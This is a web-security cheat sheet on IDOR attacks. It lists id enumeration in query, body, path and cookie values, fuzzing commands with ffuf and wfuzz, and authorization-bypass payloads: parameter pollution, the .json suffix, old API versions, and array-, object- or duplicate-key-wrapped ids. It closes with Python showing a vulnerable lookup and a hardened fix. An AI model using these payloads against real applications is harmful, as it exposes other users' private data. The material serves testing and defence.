# IDOR (Insecure Direct Object References) Attack

IDOR is a type of access control vulnerability in web applications: the application uses a client-supplied identifier to fetch an object without verifying that the requesting user is authorized to access that object.

### Find Vulnerabilities from HTML Source Code

First, check the values of attributes on input elements, for example a hidden field that carries the user's id.

```html
<input name="user_id" value="8" >
```

Then observe what happens when you change the value carried in the Cookie header of the HTTP request.

```http
Cookie: user_id=12
```

### Change GET Parameters

#### Manual

```text
/user?id=1
/user?id=2
/user?id=-1
/user?id=00

/admin/posts/1
/admin/posts/-1
/admin/posts/00

/static/1.txt
/static/2.txt
/static/-1.txt
/static/00.txt
```

#### Automation

```bash
# quote the URL so the shell does not treat '?' as a glob
seq 0 100 | ffuf -u 'https://example.com/user?id=FUZZ' -w -

wfuzz -z file,./numbers.txt 'https://example.com/user?id=FUZZ'
```

### Change POST Parameters

```text
address=1&user_id=1
address=1&user_id=2

# URL-encode '&'
address=1%26user_id=2
```

### Basics

Check parameter names and paths for valuable words (match each with a regex and its permutations):

```text
{regex + perm} id
{regex + perm} user
{regex + perm} account
{regex + perm} number
{regex + perm} order
{regex + perm} no
{regex + perm} doc
{regex + perm} key
{regex + perm} email
{regex + perm} group
{regex + perm} profile
{regex + perm} edit
```

### Bypasses

* Add parameters to the endpoint. For example, if a request is rejected, try appending an id parameter:

```http
GET /api_v1/messages --> 401
vs
GET /api_v1/messages?user_id=victim_uuid --> 200
```

* HTTP Parameter pollution

```http
GET /api_v1/messages?user_id=VICTIM_ID --> 401 Unauthorized
GET /api_v1/messages?user_id=ATTACKER_ID&user_id=VICTIM_ID --> 200 OK

GET /api_v1/messages?user_id=YOUR_USER_ID[]&user_id=ANOTHER_USERS_ID[]
```

* Append `.json` to the endpoint if the application is built in Ruby.

```text
/user_data/2341 --> 401 Unauthorized
/user_data/2341.json --> 200 OK
```

* Test on outdated API Versions

```text
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
```

* Wrap the ID in an array:

```json
{"id":111} --> 401 Unauthorized
{"id":[111]} --> 200 OK
```

* Wrap the ID in a JSON object:

```json
{"id":111} --> 401 Unauthorized

{"id":{"id":111}} --> 200 OK
```

* JSON parameter pollution (duplicate keys in the body):

```http
POST /api/get_profile
Content-Type: application/json

{"user_id":<legit_id>,"user_id":<victim's_id>}
```
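The server-side view of the bypasses listed above, as an added example that is not code from the original page: a vulnerable lookup next to a hardened one, plus input parsing that refuses the shapes the bypasses rely on (duplicate query parameters, `user_id[]`, array- or object-wrapped ids, duplicate JSON keys). The data store, user ids and function names are constructed for the example.

```python
import json
from urllib.parse import parse_qs
MESSAGES = {"u-1": ["hello from user 1"], "u-2": ["private note of user 2"]}  # constructed sample store

class Forbidden(Exception): ...   # session user does not own the object
class BadRequest(Exception): ...  # id parameter has an unacceptable shape

def vulnerable_get_messages(session_user, user_id):
    """IDOR: the client-supplied id is used directly; session_user is ignored."""
    return MESSAGES.get(user_id, [])

def hardened_get_messages(session_user, user_id):
    """Ownership is checked against the authenticated principal, not the input."""
    if user_id != session_user:
        raise Forbidden(f"{session_user} may not read messages of {user_id}")
    return MESSAGES.get(session_user, [])

def _scalar_id(raw):
    # Only a short non-empty string is an id: [111] and {"id":111} are refused.
    if not isinstance(raw, str) or not raw or len(raw) > 64:
        raise BadRequest("user_id must be a short non-empty string")
    return raw

def parse_query_user_id(query_string):
    """One plain user_id only; rejects HPP (user_id=A&user_id=B) and user_id[]."""
    params = parse_qs(query_string, keep_blank_values=True)
    if any(k != "user_id" and k.startswith("user_id") for k in params):
        raise BadRequest("array-style user_id[] parameter is not accepted")
    values = params.get("user_id", [])
    if len(values) != 1:
        raise BadRequest("exactly one user_id parameter expected")
    return _scalar_id(values[0])

def _reject_duplicate_keys(pairs):
    if len({k for k, _ in pairs}) != len(pairs):
        raise BadRequest("duplicate JSON keys are not accepted")
    return dict(pairs)

def parse_json_user_id(body):
    """Rejects {"user_id":A,"user_id":B}; wrapping is caught by _scalar_id."""
    data = json.loads(body, object_pairs_hook=_reject_duplicate_keys)
    return _scalar_id(data.get("user_id") if isinstance(data, dict) else None)

def handle_get_messages(session_user, query_string="", body=None):
    """Maps parse and authorization failures to HTTP-style statuses."""
    try:
        uid = parse_json_user_id(body) if body is not None else parse_query_user_id(query_string)
        return 200, hardened_get_messages(session_user, uid)
    except (BadRequest, Forbidden, ValueError) as e:  # ValueError covers malformed JSON
        return (403 if isinstance(e, Forbidden) else 400), str(e)
```

The hardened handler still accepts the id for illustration; the stronger fix is to drop the parameter entirely and key the lookup on the session user.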
